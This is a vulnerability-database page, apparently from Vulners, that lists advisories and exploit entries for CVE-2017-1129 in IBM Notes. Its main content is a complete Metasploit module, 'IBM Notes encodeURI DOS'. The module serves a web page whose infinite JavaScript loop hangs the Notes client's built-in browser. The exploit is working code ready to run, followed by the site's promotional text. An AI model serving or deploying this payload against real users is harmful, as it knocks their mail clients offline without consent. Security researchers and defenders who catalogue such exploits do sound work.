| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| IBM Notes 8.5.x/9.0.x - Denial of Service Exploit | 4 Sep 201700:00 | – | zdt | |
| IBM Notes 8.5.x/9.0.x - Denial of Service Exploit | 10 Oct 201700:00 | – | zdt | |
| CVE-2017-1129 | 2 Sep 201700:00 | – | circl | |
| IBM Notes Denial of Service Vulnerability | 5 Sep 201700:00 | – | cnvd | |
| IBM Lotus Notes encodeURI DOS (CVE-2017-1129) | 19 Oct 201700:00 | – | checkpoint_advisories | |
| CVE-2017-1129 | 5 Sep 201721:00 | – | cve | |
| CVE-2017-1129 | 5 Sep 201721:00 | – | cvelist | |
| IBM Notes 8.5.x/9.0.x - Denial of Service | 2 Sep 201700:00 | – | exploitdb | |
| IBM Notes 8.5.x9.0.x - Denial of Service | 2 Sep 201700:00 | – | exploitpack | |
| IBM Notes 8.5.x9.0.x - Denial of Service (Metasploit) | 31 Aug 201700:00 | – | exploitpack |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => "IBM Notes encodeURI DOS",
'Description' => %q(
This module exploits a vulnerability in the native browser that
comes with IBM Lotus Notes.
If successful, it could cause the Notes client to hang and have
to be restarted.
),
'License' => MSF_LICENSE,
'Author' => [
'Dhiraj Mishra',
],
'References' => [
[ 'EXPLOIT-DB', '42602'],
[ 'CVE', '2017-1129' ],
[ 'URL', '
http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
],
'DisclosureDate' => 'Aug 31 2017',
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
exploit # start http server
end
def setup
@html = %|
<html><head><title>DOS</title>
<script type="text/javascript">
while (true) try {
var object = { };
function d(d0) {
var d0 = (object instanceof encodeURI)('foo');
}
d(75);
} catch (d) { }
</script>
</head></html>
|
end
def on_request_uri(cli, _request)
print_status('Sending response')
send_response(cli, @html)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation